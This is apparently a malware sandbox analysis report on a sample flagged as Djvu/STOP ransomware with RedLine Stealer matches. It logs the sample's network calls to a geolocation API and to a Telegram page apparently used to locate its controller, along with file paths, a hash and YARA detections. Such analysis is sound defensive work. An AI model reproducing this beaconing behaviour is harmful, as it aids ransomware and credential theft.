                                                                                                                                                  2024-01-11 12:34:56 UTC906INHTTP/1.1 429 Too Many Requests
                                                                                                                                                  Date: Thu, 11 Jan 2024 12:34:56 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  strict-transport-security: max-age=63072000; preload
                                                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                  x-xss-protection: 1; mode=block; report=...
                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                  access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                  access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QNiNT6MsnkBL6DW8loyYz8gXPqVsQfO3n2FyJ1a1pM9mTTLterFUh9hzaK1dNhlDI11ivVuLHlC2Lr7tEsPSKRZapYGFxygCC9sV4MHXVBUJ7o4BFRjM5k6gWolq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 843d325e0ccf0813-IAD
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  2024-01-11 12:34:56 UTC463INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 64 63 62 34 62 39 62 30 61 63 39 63 65 65 62 35 61 63 66 32 62 31 62 39 65 33 61 66 61 39 62 65 62 36 62 39 62 66
                                                                                                                                                  Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#dcb4b9b0ac9ceeb5acf2b1b9e3afa9beb6b9bf
                                                                                                                                                  2024-01-11 12:34:56 UTC467INData Raw: d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 33 32 35 61 35 37 35 65 34 32 37 32 30 30 35 62 34 32 31 63 34 37 35 33 30 64 34 31 34 37 35 30 35 38 35 37 35 31 34 36 30 66 30 30 35 62 34 32 31 63 34 37 35 33 22 3e 3c 73 70 61 6e 20
                                                                                                                                                  Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#325a575e4272005b421c47530d414750585751460f005b421c4753"><span
                                                                                                                                                  2024-01-11 12:34:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.1149706172.67.139.2204436744C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-01-11 12:34:58 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: api.2ip.ua
                                                                                                                                                  2024-01-11 12:34:58 UTC910INHTTP/1.1 429 Too Many Requests
                                                                                                                                                  Date: Thu, 11 Jan 2024 12:34:58 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  strict-transport-security: max-age=63072000; preload
                                                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                  x-xss-protection: 1; mode=block; report=...
                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                  access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                  access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8o1bgUsjILYPlxJbQt1iq9gqH63wJu3Gphop8UiGPLSDXXUJjGUj1tQ4PIauev5efG0FYwybDl9dOPdczYddlmQCzSnhirwthR23hbfus%2BAD1%2Bgya2rnP18Mc8uK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 843d326aa9f67fa6-IAD
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  2024-01-11 12:34:58 UTC459INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 62 37 64 66 64 32 64 62 63 37 66 37 38 35 64 65 63 37 39 39 64 61 64 32 38 38 63 34 63 32 64 35 64 64 64 32 64 34
                                                                                                                                                  Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#b7dfd2dbc7f785dec799dad288c4c2d5ddd2d4
                                                                                                                                                  2024-01-11 12:34:58 UTC471INData Raw: d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 64 63 62 34 62 39 62 30 61 63 39 63 65 65 62 35 61 63 66 32 61 39 62 64 65 33 61 66 61 39 62 65 62 36 62 39 62 66 61 38 65 31 65 65 62 35 61 63 66 32 61 39 62 64 22 3e 3c 73
                                                                                                                                                  Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#dcb4b9b0ac9ceeb5acf2a9bde3afa9beb6b9bfa8e1eeb5acf2a9bd"><s
                                                                                                                                                  2024-01-11 12:34:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.1149707172.67.139.2204437304C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-01-11 12:35:00 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: api.2ip.ua
                                                                                                                                                  2024-01-11 12:35:00 UTC914INHTTP/1.1 429 Too Many Requests
                                                                                                                                                  Date: Thu, 11 Jan 2024 12:35:00 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  strict-transport-security: max-age=63072000; preload
                                                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                  x-xss-protection: 1; mode=block; report=...
                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                  access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                  access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ss%2Bqp5SeoTRWyZvuNKD4Zaj%2BFc7C0cq5XNVQ1CDrU3juhNceip%2Fc41dfI8vhJVDUBA3oJzWsF0UgkfID%2B4uqeVGEkhdbIlIJhCJxqdxhgX1DNfJDhPltxWUIpHQ8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 843d3278a9a807d4-IAD
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  2024-01-11 12:35:00 UTC455INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 39 62 66 33 66 65 66 37 65 62 64 62 61 39 66 32 65 62 62 35 66 36 66 65 61 34 65 38 65 65 66 39 66 31 66 65 66 38
                                                                                                                                                  Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#9bf3fef7ebdba9f2ebb5f6fea4e8eef9f1fef8
                                                                                                                                                  2024-01-11 12:35:00 UTC475INData Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 62 65 64 36 64 62 64 32 63 65 66 65 38 63 64 37 63 65 39 30 63 62 64 66 38 31 63 64 63 62 64 63 64 34 64 62 64 64 63 61 38 33 38 63 64 37 63 65 39 30 63 62 64 66
                                                                                                                                                  Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#bed6dbd2cefe8cd7ce90cbdf81cdcbdcd4dbddca838cd7ce90cbdf
                                                                                                                                                  2024-01-11 12:35:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.1149712149.154.167.994437480C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-01-11 12:35:06 UTC86OUTGET /bg3goty HTTP/1.1
                                                                                                                                                  Host: t.me
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  2024-01-11 12:35:06 UTC511INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                  Date: Thu, 11 Jan 2024 12:35:06 GMT
                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                  Content-Length: 12336
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: stel_ssid=1373ef4047739bef1b_4703914928252477124; expires=Fri, 12 Jan 2024 12:35:06 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Cache-control: no-store
                                                                                                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                  Strict-Transport-Security: max-age=35768000
                                                                                                                                                  2024-01-11 12:35:06 UTC12336INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 62 67 33 67 6f 74 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @bg3goty</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.1149719172.67.139.2204437636C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-01-11 12:35:11 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: api.2ip.ua
                                                                                                                                                  2024-01-11 12:35:12 UTC914INHTTP/1.1 429 Too Many Requests
                                                                                                                                                  Date: Thu, 11 Jan 2024 12:35:12 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  strict-transport-security: max-age=63072000; preload
                                                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                  x-xss-protection: 1; mode=block; report=...
                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                  access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                  access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ps089X16szE0r5qMcecYkBxQ8ea2Q11k4IywFPHt84A3%2F4Ena3CM%2F6EHFNg0BfJScbe9f2l98xOigVPLahszLd1NkG4gZ6318fPhtdRabCS2l%2Bh5eaQ%2BHaEThhCA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 843d32c0e9543b86-IAD
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  2024-01-11 12:35:12 UTC455INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 38 34 65 63 65 31 65 38 66 34 63 34 62 36 65 64 66 34 61 61 65 39 65 31 62 62 66 37 66 31 65 36 65 65 65 31 65 37
                                                                                                                                                  Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#84ece1e8f4c4b6edf4aae9e1bbf7f1e6eee1e7
                                                                                                                                                  2024-01-11 12:35:12 UTC475INData Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 33 31 35 39 35 34 35 64 34 31 37 31 30 33 35 38 34 31 31 66 34 34 35 30 30 65 34 32 34 34 35 33 35 62 35 34 35 32 34 35 30 63 30 33 35 38 34 31 31 66 34 34 35 30
                                                                                                                                                  Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#3159545d41710358411f44500e4244535b5452450c0358411f4450
                                                                                                                                                  2024-01-11 12:35:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  5192.168.2.1149739172.67.139.2204437888C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-01-11 12:35:20 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: api.2ip.ua
                                                                                                                                                  2024-01-11 12:35:20 UTC916INHTTP/1.1 429 Too Many Requests
                                                                                                                                                  Date: Thu, 11 Jan 2024 12:35:20 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  strict-transport-security: max-age=63072000; preload
                                                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                  x-xss-protection: 1; mode=block; report=...
                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                  access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                  access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RHwAzDKwGqmlRW4D6J%2BRpxp6c98J16Jr2CAK%2B0EHZJv%2B5q2nwyLL%2BN8DzvooekGJjOmz1EJXRM%2FU4V6dUBpqDepOz1N6fa8FZN2kybFpa85v9Yxfm3zkFRyjBafQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 843d32f58bd85a7c-IAD
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  2024-01-11 12:35:20 UTC453INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 62 33 64 62 64 36 64 66 63 33 66 33 38 31 64 61 63 33 39 64 64 65 64 36 38 63 63 30 63 36 64 31 64 39 64 36 64 30
                                                                                                                                                  Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#b3dbd6dfc3f381dac39dded68cc0c6d1d9d6d0
                                                                                                                                                  2024-01-11 12:35:20 UTC477INData Raw: 20 d0 ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 66 65 39 36 39 62 39 32 38 65 62 65 63 63 39 37 38 65 64 30 38 62 39 66 63 31 38 64 38 62 39 63 39 34 39 62 39 64 38 61 63 33 63 63 39 37 38 65 64 30 38 62
                                                                                                                                                  Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#fe969b928ebecc978ed08b9fc18d8b9c949b9d8ac3cc978ed08b
                                                                                                                                                  2024-01-11 12:35:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:13:34:52
                                                                                                                                                  Start date:11/01/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:838'656 bytes
                                                                                                                                                  MD5 hash:9DE69C7A3E551DCBC9208221099680A7
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1229632028.000000000210A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:2
                                                                                                                                                  Start time:13:34:53
                                                                                                                                                  Start date:11/01/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:838'656 bytes
                                                                                                                                                  MD5 hash:9DE69C7A3E551DCBC9208221099680A7
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
